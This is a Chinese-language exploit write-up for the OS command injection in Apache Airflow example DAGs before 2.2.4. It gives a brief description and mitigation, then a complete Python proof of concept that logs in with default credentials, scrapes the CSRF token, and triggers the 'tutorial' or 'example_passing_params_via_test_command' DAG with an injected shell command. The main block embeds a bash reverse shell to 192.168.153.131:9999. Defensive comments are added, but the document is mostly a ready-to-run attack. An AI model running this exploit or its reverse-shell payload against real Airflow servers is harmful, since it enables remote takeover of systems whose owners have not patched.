一、描述
在 Apache Airflow 2.2.4 之前的版本中,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。
二、缓解:
这可以通过确保 [core] load_examples 设置为 False 来缓解。
三、 EXP
(payload1 和 payload2 是两个不同的利用点,选择其中一个即可)
import requests
import re
import random
# Outbound proxy mapping handed to requests via `proxies=` in payload1/payload2.
# Both schemes are routed to 127.0.0.1:8080 (presumably a local intercepting
# proxy for inspecting the trigger requests — confirm). Note that dl() does NOT
# pass this mapping, so the login traffic goes direct.
proxy = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080"
}
def dl(url: str, user: str, pwd: str) -> tuple[str, str]:
    """Log in to the Airflow web UI and return the resulting session cookie and CSRF token.

    Flow: GET the base URL to pick up the initial session cookie and the
    ``csrfToken`` embedded in the page, then POST the credentials to
    ``/login/?next=<url>/home`` and scrape the same two values from that response.

    Args:
        url: Base URL of the Airflow webserver, without a trailing slash.
        user: Login username.
        pwd: Login password.

    Returns:
        ``(session_cookie, csrf_token)``: the first attribute of the login
        response's ``Set-Cookie`` header (``name=value``, ';' stripped) and the
        ``csrfToken`` value found in the response HTML.

    Raises:
        KeyError: if a response carries no ``Set-Cookie`` header.
        IndexError: if no ``csrfToken`` is found in a response body (presumably
            a failed login or a different UI layout — confirm).
    """
    urls = url + '/login/?next=' + url + '/home'
    # Unauthenticated GET: the page still sets a session cookie and embeds a CSRF token.
    rep = requests.get(url)
    # Keep only the leading "name=value" cookie attribute; drop the ';' and any flags after it.
    session = rep.headers['Set-Cookie'].split()[0].replace(';', '')
    csrf = re.findall(r"var csrfToken = '(.+?)'", rep.text)[0]
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/99.0.4844.84 Safari/537.36",
        "Cookie": session
    }
    data = {
        'csrf_token': csrf,
        'username': user,
        'password': pwd
    }
    # Login POST is sent directly (the module-level `proxy` is not used here).
    reps = requests.post(urls, data=data, headers=headers)
    # The caller needs the cookie/token pair from the *login* response, not the initial GET.
    s1 = reps.headers['Set-Cookie'].split()[0].replace(';', '')
    c1 = re.findall(r"var csrfToken = '(.+?)'", reps.text)[0]
    return s1, c1
def payload1(urll: str, sess: str, csrf: str, cmd: str) -> None:
    """Trigger the ``example_passing_params_via_test_command`` example DAG with a crafted ``conf``.

    The DAG-run ``conf`` JSON carries ``cmd`` inside the ``foo`` parameter,
    wrapped in escaped quotes so that the value contains shell metacharacters.
    This is the unsanitized user-supplied parameter described in the page text
    (example DAGs before Airflow 2.2.4); it is neutralised by upgrading, or
    avoided entirely by setting ``[core] load_examples = False``.

    Args:
        urll: Base URL of the Airflow webserver.
        sess: Session cookie (``session=...``) as returned by dl().
        csrf: CSRF token as returned by dl().
        cmd: String placed in the DAG ``conf``.

    Side effects: prints the execution date used and the HTTP status of the
    trigger request; the request is sent through the module-level ``proxy``.
    """
    urls = urll + '/trigger?dag_id=example_passing_params_via_test_command'
    # Random seconds field so repeated triggers get a distinct execution_date
    # (presumably to avoid colliding with an existing run — confirm).
    code1 = random.randint(0, 60)
    dates = '2022-04-02 09:88:31+00:00'
    dates1 = dates.replace('88', str(code1))
    # conf JSON: once decoded, the `foo` value is `";<cmd>;"` — quotes and
    # semicolons inside a DAG parameter. Defenders: a POST to /trigger for an
    # example DAG whose conf contains shell metacharacters is a strong indicator;
    # the value is retained in the DagRun conf and in webserver access logs
    # (confirm log coverage for your deployment).
    cmds = '{"foo":"\\";' + cmd + ';\\""}'
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36",
        "Accept": "text/html",
        "Cookie": sess,
    }
    print(dates1)
    data = {
        'csrf_token': csrf,
        'dag_id': 'example_passing_params_via_test_command',
        'origin': '/home',
        'execution_date': dates1,
        'conf': cmds,
        # presumably needed because example DAGs start paused — confirm
        'unpause': 'on'
    }
    rep = requests.post(urls, data=data, headers=headers, proxies=proxy)
    print(rep.status_code)
def payload2(urll: str, sess: str, csrf: str, cmd: str) -> None:
    """Same as payload1, but triggers the ``tutorial`` example DAG via its ``my_param`` parameter.

    The only differences from payload1 are the ``dag_id`` (``tutorial``) and the
    ``conf`` key (``my_param``); the request shape, proxying and printed output
    are identical. The mitigation is the same: upgrade to Airflow 2.2.4 or
    later, or set ``[core] load_examples = False``.

    Args:
        urll: Base URL of the Airflow webserver.
        sess: Session cookie (``session=...``) as returned by dl().
        csrf: CSRF token as returned by dl().
        cmd: String placed in the DAG ``conf``.

    Side effects: prints the execution date used and the HTTP status of the
    trigger request; the request is sent through the module-level ``proxy``.
    """
    urls = urll + '/trigger?dag_id=tutorial'
    # Random seconds field so repeated triggers get a distinct execution_date
    # (presumably to avoid colliding with an existing run — confirm).
    code1 = random.randint(0, 60)
    dates = '2022-04-02 09:88:31+00:00'
    dates1 = dates.replace('88', str(code1))
    # conf JSON: once decoded, the `my_param` value is `";<cmd>;"` — quotes and
    # semicolons inside a DAG parameter (see payload1 for the detection note).
    cmds = '{"my_param":"\\";' + cmd + ';\\""}'
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36",
        "Accept": "text/html",
        "Cookie": sess,
    }
    print(dates1)
    data = {
        'csrf_token': csrf,
        'dag_id': 'tutorial',
        'origin': '/home',
        'execution_date': dates1,
        'conf': cmds,
        # presumably needed because example DAGs start paused — confirm
        'unpause': 'on'
    }
    rep = requests.post(urls, data=data, headers=headers, proxies=proxy)
    print(rep.status_code)
if __name__ == '__main__':
    # Hard-coded credentials: the Airflow docker-compose quick-start defaults.
    # The PoC only works where these were never changed — itself a finding worth
    # reporting independently of the example-DAG issue.
    user = 'airflow'
    pwd = 'airflow'
    url = input("url __>:")
    #url = 'http://192.168.153.131:8080'
    # String carried in the DAG conf; here a bash reverse shell to
    # 192.168.153.131:9999 (presumably the author's lab host, cf. the
    # commented-out URL above).
    cmd = 'bash -i >& /dev/tcp/192.168.153.131/9999 0>&1'
    # Authenticate once, then reuse the session cookie + CSRF token for the trigger.
    s1, c1 = dl(url, user, pwd)
    print(f'Command __>: {cmd}')
    # Only one of the two example DAGs needs to be present; payload1 is kept for
    # deployments where `tutorial` is unavailable.
    #payload1(url, s1, c1, cmd)
    payload2(url, s1, c1, cmd)